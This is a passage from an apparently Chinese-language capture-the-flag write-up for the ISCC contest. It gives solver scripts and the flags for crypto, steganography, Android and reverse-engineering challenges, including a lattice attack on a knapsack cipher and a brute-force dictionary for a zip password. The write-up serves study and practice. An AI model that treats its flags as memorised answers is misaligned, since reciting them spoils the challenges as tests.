18835091260797073562570197337192687096149062471010909287505026739256851663845652546228812299453403369197090762437909361190694731343103307114750836735997823980817474260923309093351161826331851, 31741489402516148911633197695597953081401237503796854927240741326207504993089377049583728444407858426004232071134468398273396605006577855552656764382734524654277518570822875478167442638070901, 16050117042291126277677926822141336442372387354061686268361792054293011835387201560959594636149809378193176734175577918539778477385651844891098832581022035133541637266082160308042031860506989, 16379463477204913330055508893873729174739376880548770933003570470660499885606594386561420463061184588808230491183336279782405733295425571066874025844316939637315915343557140783536280314260190, 23058007636349322493533060888214863711857942288940601048898840019057943804724486110106459414627162992559209093285612285210308835967706195433862579974709778186744020858324991526063814823612287, 19497548104095059626306207887464394273778151478519542948752215627780389285194991470064485692362185896936181237881579479933106410836542916696923953216719052408411804666552233932131319571241763, 17632121136316990934955612215609500766435472016530990904203129722465440826062961881413835332832993132979526774745855028877553216518081174139693119715949034199141619868897050824712146245401588, 1871468487319968372908785904638027514106261889215980360019125483842603309636049187223167809902816215052058167498138766999050264473961232336492552974671621923732211039196537569962142516042355, 62926073061408568815305709546008876991925602654691545685161680583826362674827494368322825291911250082105230802573121612633252347575715105923975409004163278303768506104733416649687428519800752, 65500365105957172579636962313973498672764577312979370212418478100944941884490065883379135454667686291049053276049947674376272785046831902692005131485978786748114625044420777348285369514422896, 39442084005803859743248651321324383868223256723271248941942941219329288135436852908442074189537390961087604110496233569348047766997496498099112587487212179108572289958814078996194165124356571, 28749645518483530181191626607360401710965005503452507585402702473101692981830330921977455897406578416614294892273156950031964192568883035130344623321903046909134347294496256397080491610449783, 59215486516688778254818458983882413560832323676510288447057843140104907059498699532075660384822833477717456618622107255774778427073278729948292838400614933795378669974510804626649421793785832, 38239266349865570890118308779334625251415166366089226198270068826789870291975773540805447014702851667297091330678993691371210077982768540678144457713502249064302773372842360541892860517005928, 10781869801098745922189009636686366741026376123099365671761874522828753309010095045974148776576101040476333187616026046251883938367061041869707334631470632264224458586898378761910988484407522, 44555661165298366621929077029890439918460348802513192503445343800607358749326722940430429144066972517739493904631128687734149376126254489721753894732678101106393312221317100067575618291906876, 66419168629567921834343053143841391733067579594096450584346524244338021419929728437472466918227931064432540911955687063794088879714385096689969461262536176954842293004546425098238106744967544, 53070736350010579101478261026664742633830440810518969293809356268130347073700238364938313884976128806691925379909738186549901426616348254114665071229526846834842533859242206037281011591036289, 22849589939655807391095873987864500357112477263503457235954254349498524812852403116832329056488396748162091885144551074568286219666156511990443897994844330670468980085373463662416383618461467, 7180153334322933025085037204940906254349411631575887280143813253513754261470238096914777722623869792438427552448168780705532068475077894323728119245309544237160824439200585721645590166228420, 11482439014492604534559359091537077661618461698201369584284070129079518511868618757186994516752885928499921289354962724980964253578120911579146839767416018399357811759286441128701879257327409, 13340284240190076852801996978492272593934260994217650388686339010003533927947169352715971012947009755179237313888884967110512743624920673608875707982244817410379882924572291491377414280764504, 16319742011618547561318291933298747389763403441769656204941637523542180357712784347887893270400819572630615616460967210482111595184242129252734239196181783997489879602947364401095934436633840, 25245264191238070106632203778761096089815457066460589468863204041741021444830520840049730272302444433418401417213547796426097383885110343132458212248252538060762962376716059459828802790134118, 4569462007281085626344114509743551095912755602276157412382743883572282836905576946714633114678917034713786819842866758824276969427145784594847589758199664134223615366421110564305852166850756, 16222138934890360286734397616869346119188006403962150947344247922973455683049770004862573585016786313381016665646116773581837505032908893603036889177730855936060000638140423475038765571082437, 27536486649538589838877405800312664596659200874025350885626913317294289481742460638948156829376486168554629725395805255505979788662356489076920425846567848580616902117147138363914943128262868, 19660548836315869980577632085657144304460234727275696562095405800452804952270456690413464091827809646872415608257296548283420857426618514532827157035478615928221980512251880148725239045050572, 2935575951698898266032232265490012685304313227978895061964424259438886204380199162255685722119174179934665079343266063365713050997303256282211640759431768058030092561437103884802603110488026, 15050391309067926582121418817448212157268553037114604384884318666136444999543717730382845372854181435979402248620494574452171618000054901482776133338676983233450693782357102727495150466680028, 15844239224848276396953918986430334242804023674203926124579340310286053504639009733470273287917036368416360132676495915311526874480593278206185756588598105157038681320484244707469227627438636, 60141538952334547131714083168714853189936401560162514615025382204736687748110514588745620090074870079766772161067031978039680771075103440185765155578539288563622621860106047359168162260844534, 45047381276471250981174619803556224475748621940824687575867936161420399614080749846164595911294933112671467207082180454047497664417895485437634278353614168990051094115123403717078196249807462, 63213628474195584088061650017856358607306056083424690128239046359606799520947289828953816760280214157198463731468395297879555219745776202587009614095816156557391728270483415956231481216684127, 47127670452411541823641342868939225861162646075398727586082968366329064652785940730549374132934052760090536352442764305603139737908099767454603464370232665245220297648297947630663865185956858, 27253024246190707296003159139128937539039294335558161543719274117695143050858801199381756277345531356352915974838147614765883773007952056088797078000243444232563774396178048368410683022243600, 58536339286803714222234300164727185302498750556527460206135534519254767876585761649566526890768447339045289107648373430624328699713491542596523037967861994155279091191591924807670592955011170, 57175551329982920356116680928451690094476558030201982262370861043678283259979647494102980609873273499338588744799175384224575598567727581411955085338869075971019893816832990408113023589210692, 1691228204126640565048609153105718816682391106279130954873266081535994803009983222071629038374948751966597853814710700984986351218672473434401054012842971444924818052453217913126056804136634, 18259029928340107051612327899051598631621572170439491860737800320015828939423260018800103341952219448169798069021795590884245237859665920663962296060767687499992086244092229454910838687365523, 34275887125068602666708845519395025657705837555812683307610201684446869655870749876133358373069234049138641432900703496298668500973107970893808842807146663365267834946542177020935189486846663, 59478292605909585646382908673223430222120032595326349358553695541323907659346576450864085948860581917387406847299785962961771900629629458942186507337471890453270925234354360840846884207643024, 18471913267399338563212326631641044656181709708944323035056233436403418430332177915960100112418275886822971100478565428197902731068875657494263701867756491180732018002382889213400874919101437, 28419356783698622386038466787527804412812948444393147867606362906428208603221951008262562715703516257770939548500131732375680515310439957569029091346899056154440147332745840385444672517664872, 4708757448340822715920459148813728646061290570953127713098444568688336699702657954376259939408787111187863066857145859213594085300401029256265676556400548573084764170467918774885607183523407, 63035795145332257671110618754242812319412358745570179949829104657791665675480259338228488240452172475363993781946567214140071689730597091676924635337666041026748259004653243201003399276554500, 13189986625164442133210084295476894490640116756733531036044924355555127993186837134306976392035419483325751906098295742029817206682768342920654845357323042907301486682385483087515626774642983, 56479004843147047171593377125630572933044188348660633825638380537481087842510559431561593902889277909735622988511294737943589757547993119607061747602839484836518764277869991350077042440305063]
xbit = len(pubKey)
encoded =2639622584605651396581817251490032779454497426926835395155361491646809433696877389021382879271034071363673713244579933536498932208083160752102337857045696761077282255141184610061711587402657723
A = Matrix(ZZ, xbit + 1, xbit + 1)
for i in range(xbit):
A[i, i] = 1
for i in range(xbit):
A[i, xbit] = pubKey[i]
A[xbit, xbit] = -(encoded)
res = A.LLL()
for i in range(0, xbit + 1):
B = res.row(i).list()
flag = True
for m in B:
if m != 0 and m != 1:
flag = False
break
if flag:
print (i, B)
B = ''.join(str(j) for j in B)
B = B[:-1]
B = hex(int(B, 2))[2:-1]
print (B)
运行结果:
Figure 4:
495343437b527333432d7a4b4d352d704965657
把得到的16进制转字符即可得到flag:ISCC{Rs3C-zKM5-pIee}
真相只有一个
获取附件后,更改dream文件的文件头为zip格式,然后更改它的后缀为.zip
解压获得一个文本,使用隐写处理工具SNOW,得到flag
ISCC{iUHb-4q6M-1zMX}
小光学AI
由题目可知这些像素和可以化简到x:y:z,即存在相同的倍数,生成字典,咱们直接爆破
from tqdm import tqdm
filename = "password1.txt"
with open(filename,'w') as f:
for i in tqdm(range(1, 10)):
for j in range(1, 10):
for k in range(1, 10):
print(i, j,k)
for l in range(1, 100000):
f.write(str(i*l) + ':'+str(j*l) + ':' + str(k * l) + '\n')Archpr爆破成功,得到解压密码37035:49380:61725,即比例为123456
解压得到flag
666
附件为有密码的解压包,拉到binwork进行分离
得到一张图片
使用steghide继续分离图片,弱密码123456
得到图片后修改其宽高,得到解压密码
解压后,得到流量包
whireshak分析tcp流,第17个包存在网址
访问得到一个gif
gif中存在密文,进行解码
SElERWtleTo4NTIgOTg3NDU2MzIxIDk4NDIzIDk4NDIzIFJFQUxrZXk6eFN4eA==
base64解码:HIDEkey:852 987456321 98423 98423 REALkey:xSxx
pQLKpP/EPmw301eZRzuYvQ==
进行AES解密,得到flag
Mobile
MobileA
flag分为两段,第一部分为AES加密
K@e2022%%y S0BlMjAyMiUleQ==
I&V2022*** SSZWMjAyMioqKg==
/c/ua543HrY7vfzoYfHz+nfXEsDVQ4ph+yD9gu5mAlY=
vftyujmnbv*_rtyujk_
第二部分脚本
#include <stdio.h>
#include <string.h>
int main(){
char base64[]="=pX19GV=QooOeCquHjrkMGSY";
char flag[24];
int n=0;
for(int i=5;i>=0;i--) {
if(i%2==1){
for(int j=3;j>=0;j--){
flag[j*6+i] = base64[n];
n++;
}
}
else{
for (int z = 0; z <= 3; z++) {
flag[z*6+i] = base64[n];
n++;
}
}
}
puts(flag);
}base64解码后在进行md5解密,得到第二部分
MobileB
flag进行两次加密与字符串比较
第一次加密利用了NATIVE调用了底层so文件,解压文件ida分析so找到主逻辑
so文件取出字符串在给定的字符串表中的位置然后在位置加9的部分取字符。
第二次加密根据每个字符串转换成一个值然后用0分割
写脚本
key = "52405240520120520134034020134030120130"
content = ["FIXBMTURVPYJGZOQNKASEWCHLD","UVBXSAFJDGHICZOPQRWELKTMNY","PZGNVYDEFIJCBKARLUQHMWXOST",
"FBSPMACKDRQITWHZLJXYGENOUV","DTINKLUJCOMEQRAPGSXYFZBHVW","XAMTFIRBVHEJSCDYZPKLNQGUOW",
"EVRYXJACTZGHWOPQSIBUMNDFLK","VWQGHLZBJEUYFPCSTNIKAXMORD","FJNVWSTDXYUKMBCZLIGOPEHAQR",
"NSKBRTUZEJOPGIFXCDAVWQYLMH","ASTKPZJDCLYMVHXBNWIUOQGREF","LZWXEHIMFUOPKJGAYTNCBDRSQV"]
table = {'5':'a', '1':'b', '51':'c', '2':'d', '52':'e', '12':'f', '512':'g', '3':'h', '53':'i', '13':'j', '513':'k', '23':'l', '523':'m', '123':'n', '5123':'o', '4':'p', '54':'q', '14':'r', '514':'s', '24':'t', '524':'u', '124':'v', '5124':'w', '34':'x', '534':'y', '134':'z', '5':'A', '1':'B', '51':'C', '2':'D', '52':'E', '12':'F', '512':'G', '3':'H', '53':'I', '13':'J', '513':'K', '23':'L', '523':'M', '123':'N', '5123':'O', '4':'P', '54':'Q', '14':'R', '514':'S', '24':'T', '524':'U', '124':'V', '5124':'W', '34':'X', '534':'Y', '134':'Z'}
m = ""
list = key[:-1].split('0')
for i in list:
m = m + table[i]
print(m)
iv = [0x3, 0xc, 0x6, 0x8, 0x7, 0x2, 0x4, 0xb, 0x1, 0x5, 0x9, 0xa]
v = []
for i in range(12):
index = content[iv[i]-1].index(m[i])
v.append(index)
print(v)
flag = ""
for j in range(12):
flag += content[iv[j]-1][(v[j]-9)%26]
print(flag)得到flag
ISCC{FLAGISREMAIN}
Mobile Analysis
先将输入的字符串base64编码后分成0-16,16-32,32-len-1三部分,第一部分在C0541B的m14函数,后两部分在C0541B的m15函数中
C0541B中m14函数将传进来的字符串每三位一组进行换位,m15函数将传进来的两个字符串分别进行加密又一个与C0542C中的m16函数的返回值比较,另一个进行AES加密后与给出的字符串比较
m14函数根据比较的字符串逆推得到base编码后的第一部分字符串
SVNDQ3tkaXNwbGFjm14函数中a直接利用C0542C中的m16函数运行出字符串即可
字符串为
J0tpzHRuhTQpLauSkey现在也解出来了,IV也给了AES加密后的密文也有可以直接解出字符串b
otG28PYN8CtG现在a与b有了只需要看C504A中的m12与m13函数即可
这两个函数根据不同的码表做换值操作,先根据码表找到每个字符串对应的字符串,最后在解码得到a与b加密前的字符串
public static String m12a(String str) {
String str2 = "";
for (int i = 0; i < str.length(); i++) {
if ("cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678=".indexOf(str.charAt(i)) != -1) {
str2 = str2 + "cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678=".charAt(((5 * "cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678=".indexOf(str.charAt(i))) + 8) % 64);
} else {
str2 = str2 + str.charAt(i);
}
}
return str2;
}
public static String enm12a(String str) {
String str2 = "";
for (int i = 0; i < str.length(); i++) {
if ("cdeEFGfghijkKLHIJNO9/PQYqrsMnoRSTablBCDtZ012UVWXpyzA345umvwx678=".indexOf(str.charAt(i)) != -1) {
str2 = str2 + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/=".charAt("g6dfYnaH9qFiIoby5RlZB0WAxJVzhLOD2p4w=uT/rmcGjkMC1X7ePsSKNQ3v8tUE".indexOf(str.charAt(i)));
} else {
str2 = str2 + str.charAt(i);
}
}
return str2;
}
public static String m13b(String str) {
String str2 = "";
for (int i = 0; i < str.length(); i++) {
if ("cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv".indexOf(str.charAt(i)) != -1) {
str2 = str2 + "cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv".charAt(((5 * "cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv".indexOf(str.charAt(i))) + 8) % 64);
} else {
str2 = str2 + str.charAt(i);
}
}
return str2;
}
public static String enm13b(String str) {
String str2 = "";
for (int i = 0; i < str.length(); i++) {
if ("cdYqrsMneEFwxg78=GfKlLHRSTabBCDtZ012UhiQok6VWmXpjIJNO9/PyzA345uv".indexOf(str.charAt(i)) != -1) {
str2 = str2 + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/=".charAt("6lTD9AC/5YQIinxbw3cs4tUXfoF8egj1EdMyLWkV=NRB02uqvrZhmJPpOza7KGHS".indexOf(str.charAt(i)));
} else {
str2 = str2 + str.charAt(i);
}
}
return str2;
}
public static void main(String[] args) {
System.out.println(m12a("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/="));
System.out.println(m13b("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/="));
//g6dfYnaH9qFiIoby5RlZB0WAxJVzhLOD2p4w=uT/rmcGjkMC1X7ePsSKNQ3v8tUE
//6lTD9AC/5YQIinxbw3cs4tUXfoF8egj1EdMyLWkV=NRB02uqvrZhmJPpOza7KGHS
System.out.println(m12a("J0tpzHRuhTQpLauS"));
System.out.println(m13b("otG28PYN8CtG"));
//ZV9hbHRlcm5hdGl2
//ZV9tb2JpbGV9
}得到base编码后的字符串
SVNDQ3tkaXNwbGFjZV9hbHRlcm5hdGl2ZV9tb2JpbGV9
解码得到flag
ISCC{displace_alternative_mobile}reverse
GetTheTable
64位IDA打开
这里是一个base58加密正常码表直接解密得到flag
ISCC{Jg19fn97QBoki}
Amy's Code
32位IDA打开
有两个加密sub_4115FF与sub_411433
sub_4115FF中异或算法
sub_411433的算法
#include <stdio.h>
#include <string.h>
int main(){
char c[]="LWHFUENGDJGEFHYDHIGJ";
char flag[]={ 149, 169,137,134,212,188,177, 184,177,197,192,179,153,162, 148, 137,196,
140,188,184};
for(int i=0;i<strlen(c);i++){
flag[i]=(flag[i]-c[i])^i;
}
puts(flag);
} 得到flag
How_decode
64ida
加密然后比较
XXTEA加密
#include <stdint.h>
#include <stdio.h>
#define DELTA 0x9e3779b9
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))
static int32_t * xxtea_uint_decrypt(int32_t * data, size_t len, int32_t * key) {
int32_t n = (uint32_t)len - 1;
int32_t z, y = data[0], p, q = 6 + 52 / (n + 1), sum = q * DELTA, e;
if (n < 1) return data;
while (sum != 0) {
e = sum >> 2 & 3;
for (p = n; p > 0; p--) {
z = data[p - 1];
y = data[p] -= MX;
}
z = data[n];
y = data[0] -= MX;
sum -= DELTA;
}
return data;
}
int main(){
int32_t v[]=
{0x7D90FB64,0x587DD5DD,0xC256EE5B,0xEC70DCC,0x79DCE37E,0x42BEA10,0xAF16032,0xC264DCB8,0x2DE09F8D,0xDEEC4C0C,0x5B35F4BF,0x6FE8E678,0x505856E7, 0xEA467BD, 0x3E21E33A,0xF5A48DBE,0xCED748C2,0xFE460D71};
int32_t k[4]= { 73, 83, 67, 67 };
int n= 18;
xxtea_uint_decrypt(v, n, k);
for (int i = 0; i < 18; i++ )
printf("%c", v[i]);//
return 0;
} Sad Code
32位IDA打开,两个方程组解出来就得到flag
import binascii
import z3
a = z3.Real('a')
b = z3.Real('b')
c = z3.Real('c')
d = z3.Real('d')
s = z3.Solver()
s.add(c + 7 * b - 4 * a - 2 * d == 0x1D672E030)
s.add(5 * d + 3 * c - b - 2 * a == 0x150C28A7F)
s.add(2 * b + 8 * d + 10 * a - 5 * c == 0x51EE148A4)
s.add(7 * a + 15 * b - 3 * d - 2 * c == 0x7C12A2C80)
if s.check() == z3.sat:
result = s.model()
print(result) #[b = 2068009560,a = 1230193475,d = 1378700867,c = 1094928730]
else:
print('no result')
a = z3.Real('a')
b = z3.Real('b')
c = z3.Real('c')
d = z3.Real('d')
s = z3.Solver()
s.add(15*a + 35*d - b - c == 0xF919FB032)
s.add(38*c + a + d - 24*b == 0x7060508FA)
s.add(38*b + 32*a - c - d == 0x124F561560)
s.add(a + 41*c - b - 25*d == 0x51C97373E)
if s.check() == z3.sat:
result = s.model()
print (result) #[b = 1095576901,a = 1245988943,d = 1448236925,c = 1414878529]
else:
print ('no result')
z31 = [2068009560,1230193475,1378700867,1094928730]
z32 = [1095576901,1245988943,1448236925,1414878529]
b = binascii.a2b_hex(hex(z31[0])[2:])
a = binascii.a2b_hex(hex(z31[1])[2:])
d = binascii.a2b_hex(hex(z31[2])[2:])
c = binascii.a2b_hex(hex(z31[3])[2:])
flag = a + b +c + d
b = binascii.a2b_hex(hex(z32[0])[2:])
a = binascii.a2b_hex(hex(z32[1])[2:])
d = binascii.a2b_hex(hex(z32[2])[2:])
c = binascii.a2b_hex(hex(z32[3])[2:])
flag += a + b +c + d
print(flag) #ISCC{CRXACIZR-NCJDHOAM-ETUUAVRW}Bob's Code
32位ida,加点操作,字符串循环
sub_4116E0
#include <stdio.h>
#include <string.h>
int main(){
char Str2[]=".W1BqthGbebXtc1X4XY0yo.M15ojfYXMRxBYUzVXhVoXXrX05vVY01fhtkoF0.";
for(int i=0;i<strlen(Str2);i++){
if ( Str2[i] < 65 || Str2[i] > 90 ){
if ( Str2[i] >= 97 && Str2[i] <= 122 )
Str2[i] = (Str2[i]+24 - 97) % 26 + 97;
}
else{
Str2[i] = (Str2[i]+24 - 65) % 26 + 65;
}
}
puts(Str2); //
}得到
.U1ZorfEzczjJrKZWVMxgr.WVTmDfHmNBZY2PVmLrTmUnorLZ3YVrKmE5imD0.sub_411023去掉点.
sub_41138
ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_找到源码表然后解密
字符串进行换码表解密后得
SVNDQ3s2cFFVVlFEeS01a2pYcjU2TS1CNFVwaTd0NH0=
在进行base64正常码表解密
Ruststr
比较字符串
首先大小写转换
字符看情况加一或者减一
根据key换数据
异或操作
base解码后
写exp
#include <stdio.h>
#include <string.h>
int main(){
char flag[100];
char enc[]={0xE4,0x2C,0xEC,0x6E,0xDD,0x51,0xA3,0xAD,0x68,0xCB,0x21,0x82,0x64,0x97,0x4E,0x0A,0x3E,0x4B,0x51,0x07,0x8F,0x79,0x60,0x5B,0x9B };
char v[]={0x9A, 0x78, 0xB6, 0x12, 0xBE, 0x66, 0x8D, 0xCF, 0x51, 0x9E,0x63, 0xCB, 0x4A, 0xD1, 0x1A, 0x59, 0x78, 0x1C, 0x17, 0x73,0xF2, 0x1D, 0x05, 0x2F, 0xF0, 0xD7, 0xB3, 0x22, 0x5D, 0xAD,0x0B, 0xE2,0};
char key[]={0x32, 0x63, 0x65, 0x61, 0x39, 0x66, 0x30, 0x34, 0x63, 0x36, 0x33, 0x62, 0x34, 0x32, 0x38, 0x33, 0x39, 0x34, 0x30, 0x65, 0x63, 0x30, 0x65, 0x36, 0x64, 0x32, 0x39, 0x62, 0x65, 0x32, 0x38, 0x64};
int n=strlen(enc);
for(int i=0;i<n;i++){
enc[i] ^=v[i];
if(((key[i]+0xd0)&0xff)>0xa)
enc[i]-=2;
else
enc[i]-=1;
if((enc[i]>='a'&&enc[i]<='z')||(enc[i]>='A'&&enc[i]<='Z'))
enc[i]^=0x20;
}
for(int i=n-1;i>=0;i--){
printf("%c",enc[i]);
}
}得到flag
ISCC{Reverse-gat7A-5BZxr}VigenereLike
两个算法作比较
第一个算法异或
第二个算法
一个base编码
一个根据字符串加key在abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789中的位置得到flag
先根据key获取base解码后的字符串
#include <stdio.h>
#include <string.h>
char table[]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
int chat(char c){
for(int i=0;i<strlen(table);i++){
if(table[i]==c)
return i;
}
}
int main(){
char flag[]="rJFsLqVyFKYjHECgEOkcC6MAmQ9sMDr0ZommCrv";
char key[]="ISCCYES";
int n;
for(int i=0;i<strlen(flag);i++){
flag[i]=table[((chat(flag[i])-chat(key[i%7]))+63)%63];
}
puts(flag);//U2d1YXd1YiwwdX5zcmxJVy59V3FLeW0ybVFPV04
}base解码得到
Sguawub,0u~srlIW.}WqKym2mQOWN写异或得到flag
#include <stdio.h>
#include <string.h>
int main(){
char enc[]="Sguawub,0u~srlIW.}WqKym2mQOWN";
for(int i=0;i<strlen(enc);i++){
enc[i]=enc[i]^(i%7+1);
}
puts(enc);//Reverse-2vzvtkHU-yRwLxo1iTIPO
}得到flag
ISCC{Reverse-2vzvtkHU-yRwLxo1i}